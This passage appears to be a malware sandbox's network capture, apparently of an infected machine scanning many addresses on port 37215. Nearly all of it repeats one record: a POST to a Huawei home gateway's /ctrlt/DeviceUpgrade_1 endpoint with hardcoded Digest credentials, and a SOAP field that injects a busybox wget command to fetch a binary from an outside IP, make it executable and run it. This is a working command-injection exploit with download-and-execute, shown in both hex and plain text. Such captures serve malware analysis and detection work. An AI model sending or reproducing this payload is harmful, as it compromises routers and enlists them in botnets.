                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            398192.168.2.1544042197.98.233.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782617092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            399192.168.2.1554868197.182.176.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782630920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            400192.168.2.1546810197.181.130.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782660007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            401192.168.2.1555720197.196.90.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782679081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            402192.168.2.1544428197.96.38.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782704115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            403192.168.2.1538004197.158.127.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782742977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            404192.168.2.1535088197.83.237.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782753944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            405192.168.2.1534292197.219.102.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782783985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            406192.168.2.1544048197.239.85.20537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782810926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            407192.168.2.1546894197.14.219.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782828093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
